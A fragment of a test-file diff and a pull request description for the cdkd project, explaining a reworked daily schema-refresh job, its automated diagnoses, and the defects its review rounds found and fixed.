+    expect(md).toContain('was given with no value');
+    expect(md).not.toContain('-property-coverage');
+  }, 60_000);
+
+  it('refuses a log path that is a DIRECTORY, naming the cause', () => {
+    // It passes `existsSync` and throws `EISDIR` inside `readFileSync`, which
+    // collapsed the whole report to the generic one-line failure. Every other
+    // refusal here names what was wrong.
+    const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
+      '--skipped-log',
+      tmpdir(),
+    ]);
+    expect(md).toContain('which is a directory');
+  }, 60_000);
+
   it('renders a case-divergence without asking npm anything', () => {
     const md = run(
       'nested-key-coverage: FAIL — nested CFn->SDK key divergence(s) detected.\n' +


### PR DESCRIPTION
Follow-up to https://github.com/go-to-k/cdkd/pull/2722, from three maintainer objections. Fable — which set the original direction on go-to-k/cdkd#2718 — reviewed all three reversals and confirmed each.

## 1. It only ran monthly

The cadence was justified by "~3 writable properties a month, so a tighter cycle pays a full fixed cost per fraction of a property". That priced a review cycle per RUN, which is not what happens:

- a day with no drift opens **no PR at all** — the job stops at the drift check;
- the open-PR guard bounds concurrency at one regardless of frequency;
- a smaller diff is easier to classify than a batch (the first measured cycle carried 9 drifted types at once).

Daily shipped in a follow-up commit; this carries the branch stamp to `%Y-%m-%d`, without which the second run in a month collides with its own branch.

## 2. An open PR held back every later cycle

The skip was justified by "a human commits classifications onto that branch and a bot push would destroy them" — a generalisation of force-push semantics onto plain push. The artifacts disagree: `bogusTolerated` is explicitly preserved across regeneration, `NESTED_KEY_ALLOW_LIST` and provider sources are never written, and everything the job *does* rewrite is derived and recomputed from the human's current sources.

So the job now checks out the open PR's branch, measures drift against **it**, and pushes additively with a diagnosis comment. It re-checks the PR is still `OPEN` immediately before pushing — a squash merge with `--delete-branch` mid-run would otherwise have the plain push **re-create the branch as an orphan** — and gives up rather than forcing on a non-fast-forward. A push that fails while the branch has *not* moved is the opposite outcome and fails the job loudly: a green daily run that lands nothing, forever, is worth being noisy about.

Skipping cost most exactly where it hurt: a RED PR stays open longest, and a warned-about property does not actually work until its fixture lands.

## 3. A red PR said only that a decision existed

`scripts/diagnose-schema-refresh.mjs` now writes into the PR: which property, on which type, which provider lines declare it, whether the SDK still models the name and at which version, whether the same refresh **added** a similarly-spelled settable name to the same type (a possible rename, labelled a guess), and paste-able commands for settling each class. The standing backfill umbrella issue is updated by the job rather than by hand.

The earlier claim that this could not be automated was wrong — AWS publishes a third description, the SDK, which this repo already parses. What is left undecided is narrower than "it cannot be": the silencing option always turns CI green, so anything choosing under uncertainty converges on disabling the check that caught the problem.

## What the review rounds found

The design survived. Seventeen rounds each found defects in the **previous round's fixes**, and almost all of them were one defect class: **an input whose failure renders as a confident clean verdict.** A report that says "nothing needs a decision" over a red check is worse than one that crashes, and this PR produced that shape repeatedly while closing it.

**Checkers whose red never reached the report.** `property-coverage`'s exit status was discarded by `|| echo` for six rounds — run live, the report said "additions only", listed the offending property under "no decision needed", and posted it to the backfill umbrella as newly unaccounted, over a red PR. Closing that revealed `audit:sdk-attr-coverage:check` and `audit:enrichment-coverage:check`, which the workflow never ran at all, and then a five-suite family of unit tests that read the fixtures directly. Every one is reddened by a plain schema **addition** — the shape easiest to wave through. It is a collected LIST now, with per-check guidance, fenced so a sixth cannot be added to one side only.

**Parsers that returned nothing from input they could not read.** Four instances in three functions: a single pattern ran past a type whose set is `new Set<string>()` and credited its properties to another (134 entries, 131 parsed); the guard added for that compared two quantities that are equal by construction, so renaming the member emptied all 134 sets with no refusal; the sibling divergence parser kept the same zero-only blindness and dropped three of five findings silently; and a fixture whose comparison threw vanished from the removal *and* addition accounting at once.

**A guard enforced at one of five sites, then three of nine.** Property and type names come from an un-checksummable bundle, so a crafted key can close a backtick span and forge a heading in the PR body *and* the umbrella issue comment. `renderName` was added — and reverting the other four call sites left every case green. Then the poisoned-name fixture turned out to feed a **clean** `resourceType`, so three more sites were still revertible. Eleven positions now, each probed individually.

**Guards covering one spelling of their input.** A repeated flag, a glued `--flag=value`, a single-dash value, a trailing space after a line continuation, a filename's hyphens, a whole-revision git failure read as "brand-new fixture" — each was a second spelling of something already guarded.

**And fences asserting less than they claimed.** The workflow-to-guidance filter list was fenced by key set (so the command went stale), then by token set (so a dropped `\` made it run one filter and come back green), before being parsed as a command. That progression is the honest summary of the whole review: each fence was a weaker proposition than "the thing a maintainer pastes does what the job does".

## Test plan

- Full suite green: **933 files / 20,138 tests**.
- Every fix mutation-probed red, one mutation per probe, tree restored byte-exact between them. Where a mutant proved behaviourally equivalent, the assertion was moved to something that discriminates rather than counted as a pass.
- Real-repo anchors rather than synthetic fixtures throughout: the actual `register-providers.ts`, the actual generated coverage module including its empty-set entries, `asg-provider.ts` for two clients at differing versions, the real fixture directory for filename shape, and the real workflow YAML for every fence over it.
- Live-run against the real repo on every path after each round — clean, non-zero status, partial parse, real divergence, each failed check. Three defects were found this way and by nothing else, including an unrelated `@aws-sdk/client-sts` reported as the lagging client.
- Rebased onto main (7 commits, zero file overlap) to pick up three `scripts/check-*.ts` that new CI jobs invoke.

`docs/schema-refresh-runbook.md` is the operator page — what arrives, what to do, and the commands for each class. It is `unlisted`, since its reader is a maintainer rather than a cdkd user.
